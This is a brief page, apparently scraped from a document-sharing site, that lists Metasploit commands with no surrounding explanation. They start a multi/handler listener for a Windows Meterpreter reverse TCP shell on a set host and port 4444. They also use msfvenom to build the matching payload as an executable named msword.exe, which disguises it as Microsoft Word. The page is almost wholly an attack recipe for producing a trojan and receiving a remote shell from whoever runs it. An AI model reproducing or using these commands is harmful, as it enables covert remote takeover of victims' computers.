You are on page 1of 1

route -n

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.122.129
set lport 4444

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp


LHOST=172.16.122.129 LPORT=4444 -f exe >/root/Desktop/msword.exe

You might also like